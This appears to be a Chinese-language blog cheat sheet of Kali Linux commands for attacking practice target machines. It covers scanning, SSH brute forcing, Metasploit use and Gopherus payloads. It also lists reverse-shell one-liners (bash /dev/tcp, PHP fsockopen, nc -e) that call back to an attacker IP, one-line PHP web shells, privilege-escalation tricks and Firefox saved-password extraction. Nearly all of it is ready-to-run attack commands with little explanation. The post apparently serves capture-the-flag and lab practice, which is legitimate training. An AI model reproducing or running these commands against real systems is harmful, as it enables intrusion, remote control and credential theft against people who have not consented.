【网络安全】Kali中常用打靶工具及命令(随时补充)

一、信息收集

1. 查看同网段所有主机
arp-scan -l
2. nmap扫描
nmap -A -T4 -p- 192.168.15.134
3. 目录扫描
dirsearch -u http://192.168.15.134/
ffuf -u http://192.168.15.134/FUZZ -w /home/kali/fuzz.txt(字典) -c -ic -e  .asp,.php,.html,.txt 
4. 站点扫描
wpscan -u http://deathnote.vuln/wordpress -e u
wpscan --api-token=获取到的免费api-token --url=http://192.168.15.135/blog -e p --plugins-detection aggressive
joomscan -u http://192.168.15.134/joomla

二、爆破

1. hydra
hydra -L user.txt(用户名字典) -P notes.txt(密码字典) ssh://192.168.15.130

三、漏洞利用

1. msf工具
msfconsole                       #启动msf
search file manager wordpress    #查找漏洞相关exp
use 1                            #使用第1个exp
show options                     #查看需要设置的参数
set RHOSTS 192.168.15.135        #设置靶机IP
set TARGETURI /blog              #设置路径
set LHOST 192.168.15.131         #设置攻击IP
run                              #启动攻击
/bin/bash -i                     #升级shell
2. gopherus工具

Gopherus工具是用来专门生成gopher协议的payload工具,通过gopher协议的以及各种被攻击应用的tcp包特点来构造payload

目前支持生成payload应用有:

  • MySQL (Port:3306)
  • FastCGI (Port:9000)
  • Memcached (Port:11211)
  • Redis (Port:6379)
  • Zabbix (Port:10050)
  • SMTP (Port:25)
#安装gopherus工具
git clone https://github.com/tarunkant/Gopherus.git
#进入gopherus工具目录
cd Gopherus
#使用
./gopherus.py --exploit mysql
3. searchsploit查找插件漏洞
searchsploit 插件

payload路径

/usr/share/exploitdb/exploits/

四、反弹shell

1. 反弹shell
bash -i >&/dev/tcp/192.168.15.131/6666 0>1&
2. php反弹shell
<?php $sock=fsockopen("192.168.15.131",7777);exec("/bin/sh -i <&3 >&3 2>&3"); ?>
<?php system($_GET['shell']); ?>
3. nc反弹shell
nc -e /bin/bash 192.168.15.137 7777
4. nc开启监听
nc -lnvp 7777(端口号)
5. 升级shell交互式
python3 -c 'import pty;pty.spawn("/bin/bash")'

五、Webshell管理工具

1. 一句话木马
<?php eval($_REQUEST[password]); ?>
2. 蚁剑
#下载蚁剑
https://github.com/AntSwordProject
#解压蚁剑加载器压缩包
unzip AntSword-Loader-v4.0.3-linux-x64
#解压蚁剑源码压缩包
unzip antSword-master
#进入蚁剑加载器目录
cd AntSword-Loader-v4.0.3-linux-x64
#启动加载器
./AntSword 

六、提权

1. 使用PATH变量
find / -perm -4000 -type f 2>/dev/null
strings 可执行文件
cd /tmp
echo "/bin/sh" > 调用命令
chmod 777 调用命令
export PATH=/tmp:$PATH
echo $PATH
/opt/statuscheck
whoami
2. Mysql提权
sudo -u root mysql -e '\! /bin/bash'

七、文件分析工具

1. strace工具检查文件运行过程
strace ./reset_root(文件名)

八、其他工具

1. MD5生成
echo -n "password" |md5sum
#生成的MD5:5f4dcc3b5aa765d61d8327deb882cf99
2. 生成SSH密钥对
ssh-keygen
3. firefox_decrypt提取工具
#下载firefox_decrypt工具
git clone https://github.com/unode/firefox_decrypt.git
#进入工具目录
cd firefox_decrypt
#使用工具
python3 firefox_decrypt.py /root/.mozilla/firefox
4. 端口转发
ssh -Nf -L 9999:127.0.0.1:8080 aeolus@192.168.15.138
5. smbclient工具
smbclient -L 192.168.15.138
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值